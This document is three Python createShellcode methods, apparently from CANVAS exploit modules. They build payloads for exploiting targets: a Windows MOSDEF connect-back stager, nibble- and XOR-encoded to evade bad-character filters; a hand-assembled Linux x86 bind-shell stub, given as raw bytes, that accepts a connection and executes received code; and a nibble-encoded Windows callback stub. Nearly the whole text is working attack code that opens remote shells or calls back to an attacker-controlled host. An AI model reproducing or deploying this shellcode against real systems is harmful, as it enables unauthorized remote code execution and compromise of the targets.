    def createShellcode(self):
        """Build the win32 callback payload and stash it in self.shellcode.

        Pipeline: generate the raw MOSDEF connect-back stub for
        self.callback.ip:self.callback.port, nibble-encode it so the result
        contains no uppercase ASCII letter (A-Z), then XOR-encode that against
        the exploit's real bad-character set (self.badstring).

        Returns the final encoded shellcode, or None when the XOR encoder
        produced an empty buffer.
        """
        generator = shellcodeGenerator.win32()
        # findeipnoesp: don't mess with eip; esp adjustment comes from self.subesp.
        generator.addAttr("findeipnoesp", {"subespval": self.subesp})
        generator.addAttr("revert_to_self_before_importing_ws2_32", None)
        generator.addAttr("tcpconnect", {"port": self.callback.port, "ipaddress": self.callback.ip})
        generator.addAttr("CreateThreadRecvExecWin32", {"socketreg": "FDSPOT"})  # MOSDEF stager
        generator.addAttr("ExitThread", None)

        stage = generator.get()
        print("[!] RAW Shellcode len: %d bytes" % len(stage))

        # Pass 1: nibble encoding.  Every uppercase letter A..Z (inclusive) is
        # treated as a bad byte here -- the original comment said "a-z", but the
        # range is ord('A')..ord('Z'), i.e. uppercase only.
        uppercase_bad = "".join(chr(c) for c in range(ord('A'), ord('Z') + 1))
        nibbler = nibble_encoder.intel_nibbleencoder()
        nibbler.setbadstring(uppercase_bad)
        stage = nibbler.encode(stage)
        print("[!] Nibble Encoded Shellcode len: %d bytes" % len(stage))

        # Pass 2: simple XOR with a key chosen to avoid the real badstring.
        xorer = xorencoder.simpleXOR()
        xorer.setbadstring(self.badstring)
        xorer.find_key(stage)
        self.shellcode = xorer.encode(stage)
        print("[!] Shellcode len: %d bytes" % len(self.shellcode))

        # An empty buffer means encoding failed; report that as None.
        return self.shellcode if len(self.shellcode) else None
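    def createShellcode(self):
        """Build the payload for the selected target and stash it in self.shellcode.

        Linux targets get a fixed, hand-assembled x86 bind stager.  Windows
        targets get the small win32 callback stub for self.callback, nibble-encoded
        against self.badstring; if that fails, an int3 sled is used instead so the
        exploit still runs (and traps under a debugger).

        Returns self.shellcode.  For a target whose platform string contains
        neither "linux" nor "windows", self.shellcode is set to None and a
        message is logged, instead of falling through to an AttributeError.
        """
        osname = targets[self.version][0].lower()

        if osname.find("linux") > -1:
            # Hand-rolled x86 Linux shellcode, bind port 49087 (0xbfbf below).
            #
            # 1/ A callback payload can't be used because dsmserv dies after
            #    exploitation, so the connection would be broken.
            # 2/ A multi-stage shellcode would be the fix, but it is not wired
            #    up through the CANVAS API yet.
            # TODO: MOSDEF
            #
            # SECURITY NOTE: the listener binds a fixed port on all interfaces
            # (sin_addr pushed as 0) and accepts the first connection with no
            # authentication; the tail of the stub appears to read up to 0xc00
            # bytes from that socket onto the stack and jump to them (verify
            # against a disassembly).  Anyone who reaches the port first gets
            # code execution in the target process.
            self.shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"

        elif osname.find("windows") > -1:
            try:
                self.createSmallWin32Shellcode(self.callback.ip,
                                               self.callback.port,
                                               subesp=3000)
                encoder = nibble_encoder.intel_nibbleencoder()
                encoder.setbadstring(self.badstring)
                self.shellcode = encoder.encode(self.shellcode)
            except Exception as e:
                # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
                # still propagate.  The usual cause is self.callback being unset
                # because -l/-d were not given; log the real reason as well so an
                # encoder failure is not misreported as a missing callback.
                self.log(
                    "[!] did you forget to set -l -d on the commandline !?")
                self.log("[!] shellcode generation failed: %s" % e)
                self.shellcode = "\xcc" * 256

        else:
            self.log("[!] unsupported target platform: %s" % osname)
            self.shellcode = None

        #print "[!] shellcode length is %d bytes"% len(self.shellcode)
        return self.shellcode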
    def createShellcode(self):
        """Generate the win32 callback shellcode for self.callback and nibble-encode it.

        The encoder avoids every byte in self.badstring; the encoded payload is
        stored in self.shellcode and returned.  No XOR layer is applied here.
        """
        self.createWin32Shellcode("", self.callback.ip, self.callback.port)

        nibbler = nibble_encoder.intel_nibbleencoder()
        nibbler.setbadstring(self.badstring)
        self.shellcode = nibbler.encode(self.shellcode)
        return self.shellcode